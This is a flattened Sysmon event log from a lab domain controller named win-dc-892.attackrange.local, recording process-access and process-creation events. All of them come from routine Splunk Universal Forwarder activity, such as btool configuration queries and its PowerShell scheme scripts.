12:02:57.000{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008354Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.000{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64F1-6064-F200-00000000AE01}4132C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008353Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.000{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008352Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.000{266CAFBE-64F1-6064-F100-00000000AE01}54326700C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{266CAFBE-64F1-6064-F200-00000000AE01}4132C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008351Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.008{266CAFBE-64F1-6064-F200-00000000AE01}4132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{266CAFBE-64F1-6064-F100-00000000AE01}5432C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list replication_port --no-log 10341000x80000000000000008350Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.000{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F1-6064-F100-00000000AE01}5432C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008349Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.000{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008348Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.000{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008347Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.000{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008346Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.000{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008345Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.000{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64F1-6064-F100-00000000AE01}5432C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008344Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.000{266CAFBE-64F0-6064-F000-00000000AE01}10525444C:\Windows\system32\cmd.exe{266CAFBE-64F1-6064-F100-00000000AE01}5432C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008343Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:57.001{266CAFBE-64F1-6064-F100-00000000AE01}5432C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{266CAFBE-64F0-6064-F000-00000000AE01}1052C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-log 10341000x80000000000000008482Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.840{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F2-6064-0101-00000000AE01}5292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008481Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008480Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008479Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008478Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.840{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008477Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.840{266CAFBE-6469-6064-0500-00000000AE01}624640C:\Windows\system32\csrss.exe{266CAFBE-64F2-6064-0101-00000000AE01}5292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008476Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.840{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F2-6064-0101-00000000AE01}5292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008475Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.842{266CAFBE-64F2-6064-0101-00000000AE01}5292C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell2.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008474Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.731{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F2-6064-0001-00000000AE01}3448C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008473Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.731{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008472Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.731{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008471Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.731{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008470Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.731{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008469Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.731{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64F2-6064-0001-00000000AE01}3448C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008468Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.731{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F2-6064-0001-00000000AE01}3448C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008467Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.733{266CAFBE-64F2-6064-0001-00000000AE01}3448C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008466Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 